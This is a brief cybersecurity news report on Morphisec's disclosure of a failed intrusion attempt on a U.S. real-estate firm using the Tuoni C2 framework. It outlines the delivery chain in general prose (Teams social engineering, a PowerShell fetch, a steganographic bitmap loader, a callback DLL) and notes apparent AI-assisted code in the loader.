Cybersecurity researchers disclosed a mid-October 2025 intrusion attempt against a major U.S.-based real-estate company that involved the emerging Tuoni command-and-control framework. Morphisec researcher Shmuel Uzan said the campaign deployed stealthy, in-memory payloads tied to the Tuoni project.
Tuoni is promoted as a C2 and red teaming framework for security professionals; a “Community Edition” is freely available on GitHub and the tool was first released in early 2024, according to the disclosure shared with researchers.
The attackers appear to have gained initial access through social-engineering involving Microsoft Teams impersonation and persuaded an employee to run a PowerShell command. That command fetched a second PowerShell script from an external server and used steganography to conceal a next-stage payload inside a bitmap image, with the embedded code extracting shellcode and executing it in memory.
Execution led to a component identified as “TuoniAgent.dll,” which connected back to the external host. The DLL corresponds to an agent that operates on the compromised host and enables command-and-control communications, allowing remote control if successfully established.
Morphisec analysts noted that, while Tuoni itself is a sophisticated but conventional C2 framework, elements of the delivery chain displayed signs of AI-assisted code generation, visible in scripted comments and modular loader structure. The company said the attack was ultimately unsuccessful; the incident follows other reports in 2025 of attackers experimenting with AI to accelerate exploitation.
The disclosure underscores continued abuse of red teaming and penetration-testing tools by threat actors and the blending of traditional techniques with new code-generation aids.